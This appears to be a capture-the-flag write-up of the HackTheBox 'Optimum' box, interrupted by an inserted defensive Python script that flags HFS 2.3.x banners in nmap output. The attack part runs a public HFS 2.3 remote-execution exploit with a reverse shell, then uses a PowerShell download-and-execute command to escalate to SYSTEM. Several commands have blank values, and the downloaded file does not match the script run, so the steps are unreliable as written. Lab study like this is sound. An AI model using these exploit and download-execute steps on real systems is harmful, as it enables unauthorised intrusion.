An easy Windows box from HackTheBox, running a CVE POC to get initial access, and then another POC to get SYSTEM.



Running the usual nmap

sudo nmap -sC -sV -oA nmap/optimum
Nmap scan report for  
Host is up (0.038s latency).  
Not shown: 999 filtered tcp ports (no-response)  
80/tcp open  http    HttpFileServer httpd 2.3  
|_http-title: HFS /  
|_http-server-header: HFS 2.3  
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

The scan shows a service called “HTTP File Server” (HFS), version 2.3, on port 80 - run searchsploit against it

searchsploit httpfileserver 2.3

And find that there is an RCE for this version, with a Python script

Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
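
Seen from the defender's side, the banner that made this box quick to triage can be caught in routine scan review. The following is an added example, not part of the original writeup: it reads nmap's normal output and flags any host advertising HFS 2.3.x (the range the searchsploit entry names), including the case where only the http-server-header script reveals it. The sample scan is constructed, the addresses are documentation addresses, and the regexes and the `audit` function are assumptions of this example.

```python
import re

# Constructed sample in the same shape as the scan output above.
# 192.0.2.x are documentation addresses, not the box's IP.
SAMPLE_SCAN = """\
Nmap scan report for 192.0.2.10
Host is up (0.038s latency).
80/tcp   open  http    HttpFileServer httpd 2.3
|_http-title: HFS /
|_http-server-header: HFS 2.3
8080/tcp open  http    HttpFileServer httpd 2.4
Nmap scan report for 192.0.2.11
Host is up (0.040s latency).
80/tcp open  http    nginx
|_http-server-header: HFS 2.3.1
"""

HOST = re.compile(r"^Nmap scan report for\s*(.*)$")
PORT = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")
HEADER = re.compile(r"^\|_?\s*http-server-header:\s*(.+)$")
# Assumed policy for this example: any HFS banner in the 2.3.x range is flagged.
FLAGGED = re.compile(r"\b(?:HttpFileServer httpd|HFS)\s+(2\.3(?!\d)[\w.]*)", re.I)


def audit(scan_text):
    """Return sorted (host, port, version, evidence sources) for flagged banners."""
    found = {}
    host, port = "unknown", None
    for line in scan_text.splitlines():
        line = line.rstrip()
        if m := HOST.match(line):
            host, port = m.group(1) or "unknown", None
            continue
        if m := PORT.match(line):
            port = f"{m.group(1)}/{m.group(2)}"
            banner, source = m.group(4), "version-probe"
        elif (m := HEADER.match(line)) and port:
            # Script output belongs to the most recent open port line.
            banner, source = m.group(1), "http-server-header"
        else:
            continue
        if hit := FLAGGED.search(banner):
            entry = found.setdefault((host, port), [hit.group(1), set()])
            entry[1].add(source)
    return [(h, p, v, tuple(sorted(s))) for (h, p), (v, s) in sorted(found.items())]


if __name__ == "__main__":
    for finding in audit(SAMPLE_SCAN):
        print(finding)
```

The second host is the case worth noticing: the version probe reports only the front-end server, and the flagged banner shows up solely in the header script output.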


Download the exploit to the current directory, and run it like so

python 80 "ping"

With tcpdump listening for pings

sudo tcpdump icmp

The one from searchsploit didn’t work, but another Python script from Exploit-DB did, and it had a reverse shell baked in as well. Now have a shell on the system as “kostas”

Get the system info of the machine with


And save the output to a txt file, then run it against Windows Exploit Suggester after updating it

wes -u

wes sysinfo

This finds the system vulnerable to MS16-098

Download the exe exploit from GitHub, put it on the box and execute it

powershell -c "(new-object System.Net.WebClient).DownloadFile('','C:\Users\kostas\Desktop\41020.exe')"
powershell 39719.ps1

And we are now SYSTEM!